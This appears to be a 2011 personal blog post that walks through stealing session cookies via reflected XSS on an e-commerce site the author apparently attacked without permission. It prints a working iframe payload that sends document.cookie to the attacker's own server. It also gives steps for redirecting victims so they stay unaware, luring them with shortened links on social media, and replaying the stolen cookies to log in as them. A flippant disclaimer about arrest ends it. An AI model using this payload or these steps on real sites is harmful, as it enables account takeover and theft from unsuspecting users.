Thursday, April 28, 2011

Steal that cookie !

Well, my obsession with web security continues…

Most of the web sites rely on sessions stored in cookies to identify and authenticate users. And most of the sites are vulnerable to all sorts of injections.

Thats where all the fun is.

Here is a POC of cookie theft and session hijacking I tried on an e-commerce web site.

1. Find a way to inject some script or iFrame.

This particular site wasn't directly vulnerable to injections, but it would reflect the injected code back in the web page (Reflected XSS). When that page gets reloaded again, the injection will take place. I tried iFrame injection, it worked well.

Capture the URL that gets generated when payload (XSS string) is injected. This is what you'll pass along to the victims.

2. Steal that Cookie ! Pass along the cookie info to your web server.

There are multiple ways to do this. This is what I tried and it worked.

I stored a static page in my apache server. When I injected the iFrame, I would do some thing like this:

< iframe onload=document.location='http://my-web-server/mypage.html?p='+document.cookie / >

I have the apache logs which will log every request with the parameters. No need of making POST or GET calls though some sort of code ! (I loved that bit)


3. Redirect the victim user back to the site under attack test.

When loaded, it would redirect to the site under attack test, so that victim wouldn't be suspicious. As I mentioned simple document.location ='http://site-under-test' will do the trick.

4. Bit of social engineering, url shortening to get the victim click the link that has the XSS pay-load.

Twitter, Facebook, IMs are all out there to you help you :)

4. Hijack the session !

Extract the the SessionInfo from the logs. Replace the cookies with the victims cookies.
Hail the FSM and reload the site under attack test. Voila, you have logged in as the victim !


Few caveats :

Assumption is that victim is already logged in to the site under attack, and he/she clicks on a hyper link that injects the XSS.

This is a much better demonstration of XSS, cookie theft and session hijack than simple alert boxes.


PS: I am not responsible if you try this on public web sites and get arrested for cyber crime. In such cases, you do not know me, I do not know you :)